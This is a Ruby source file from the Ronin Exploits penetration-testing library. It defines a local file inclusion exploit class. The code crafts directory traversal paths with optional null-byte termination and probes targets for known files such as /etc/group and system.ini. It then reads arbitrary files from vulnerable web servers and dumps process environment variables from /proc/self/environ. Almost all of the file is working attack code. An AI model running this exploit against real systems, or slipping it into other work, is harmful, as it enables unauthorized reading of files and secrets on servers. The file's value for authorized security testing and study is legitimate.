#
# Ronin Exploits - A Ruby library for Ronin that provides exploitation and
# payload crafting functionality.
#
# Copyright (c) 2007-2013 Hal Brodigan (postmodern.mod3 at gmail.com)
#
# This file is part of Ronin Exploits.
#
# Ronin is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ronin is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ronin.  If not, see <http://www.gnu.org/licenses/>
#

require 'ronin/exploits/web'
require 'ronin/extensions/string'
require 'ronin/path'

require 'uri'

module Ronin
  module Exploits
    class LFI < Web

      # The minimum number of directories to traverse up
      MIN_TRAVERSAL = 2

      # The maximum number of directories to traverse up
      MAX_TRAVERSAL = 7

      # Path separators
      SEPARATORS = {
        unix:    '/',
        windows: '\\'
      }

      # Known files to try including
      KNOWN_FILES = {
        unix: {
          '/etc/group' => /root:x:0/,
          '/bin/date'  => /--(rfc-2822|rfc-3339|utc)/
        },

        windows: {
          '\windows\system.ini'  => /\[driver(?:32|64)\]/,
          '\Windows\System32\Drivers\etc\host.ini' => /(127\.0\.0\.1|::1)\s+localhost/
        }
      }

      # Specifies whether to prefix the path with a separator
      property :leading, Boolean, default: false

      # Number of directories to traverse up
      property :traversal, Integer, default: MAX_TRAVERSAL

      # Whether to terminate the LFI path with a null byte
      property :terminate, Boolean, default: false

      parameter :platform, type:        Symbol,
                           default:     :unix,
                           description: 'The Platform to target'

      # The directory separator to use
      attr_accessor :path_separator

      #
      # The path separator to use.
      #
      # @return ["/", "\\"]
      #   The path separator.
      #
      def path_separator
        @path_seperator || SEPARATORS[@platform]
      end

      #
      # Escapes a path to be used in a Local File Inclusion (LFI).
      #
      # @param [#to_s] path
      #   The path to escape.
      #
      # @return [String]
      #   The escaped path.
      #
      def escape_path(path)
        escaped_path = Path.up(self.traversal,path_separator).join(path).to_s
        escaped_path = "#{path_separator}#{escaped_path}" if self.leading?
        escaped_path = "#{escaped_path}%0"                if self.terminate?

        return escaped_path
      end

      #
      # Creates an exploit URL which includes the local path.
      #
      # @param [#to_s] path
      #   The local path to include.
      #
      # @param [Hash] query_params
      #   Additional query params.
      #
      # @return [URI::HTTP]
      #   The exploit URL.
      #
      def exploit_url(path,query_params={})
        super(escape_path(path),query_params)
      end

      #
      # Tests if a local file can be included.
      #
      # @param [String] path
      #
      # @param [String, Regexp] pattern
      #   The pattern check for in the HTTP response body.
      #
      # @return [MatchData]
      #   The match information.
      #
      def test_file(path,pattern)
        exploit(path).body.match(pattern)
      end

      #
      # Tests whether the URL and query parameter are vulnerable to LFI.
      #
      # @return [Boolean]
      #   Specifies whether the URL and query parameter are vulnerable
      #   to LFI.
      #
      # @api public
      #
      def vulnerable?
        KNOWN_FILES.each do |platform,files|
          @platform = platform

          files.each do |path,pattern|
            return true if test_file(path,pattern)
          end
        end

        @platform = nil
        return false
      end

      #
      # Emulates reading a file via Local File Inclusion (LFI).
      #
      # @param [String] path
      #   The path to read from.
      #
      # @return [String]
      #   The contents of the Local File Inclusion.
      #
      # @raise [Errno::ENOENT]
      #   The local file could not be found.
      #
      # @api private
      #
      def fs_readfile(path)
        response = exploit(path)

        if response.code == '500'
          raise(Errno::ENOENT,"No such file or directory - #{path}")
        end

        original_body = normalize_body(normal_response.body,url)
        included_body = normalize_body(response.body,exploit_url(path))

        @prefix_length ||= original_body.common_prefix(included_body).length
        @suffix_length ||= original_body.common_suffix(included_body).length

        offset = @prefix_length
        length = (included_body.length - offset) - @suffix_length

        return included_body[offset, length]
      end

      #
      # Retrieves the whole environment Hash.
      #
      # @return [Hash{String => String}]
      #   The Hash of environment variables.
      #
      def process_environ(name)
        case @platform
        when :unix
          Hash[fs_read('/proc/self/environ').split("\0").map { |key_value|
            key_value.split('=',2)
          }]
        end
      end
      
      protected

      #
      # Creates a Regular Expression to remove URI encoded text.
      #
      # @param [String] text
      #   The text to remove.
      #
      # @return [Regexp]
      #   A Regular Expression which matches the text, single or double
      #   URI encoded text.
      #
      def uri_encoded_regexp(text)
        Regexp.new('(' + text.bytes.map { |b|
          char        = b.chr
          uri_encoded = URI.encode(char,char)

          "(?:#{Regexp.escape(char)}|#{uri_encoded})"
        }.join + ')')
      end

      #
      # Removes the URL's path and query string from the response body.
      #
      # @param [String] body
      #   The response body to normalize.
      #
      # @param [URI::HTTP] url
      #   The URL to remove from the response body.
      #
      # @return [String]
      #   The normalized response body.
      #
      def normalize_body(body,url)
        unless (url.query.nil? || url.query.empty?)
          body.gsub(uri_encoded_regexp(url.query),self.url_query)
        else
          body
        end
      end

    end
  end
end
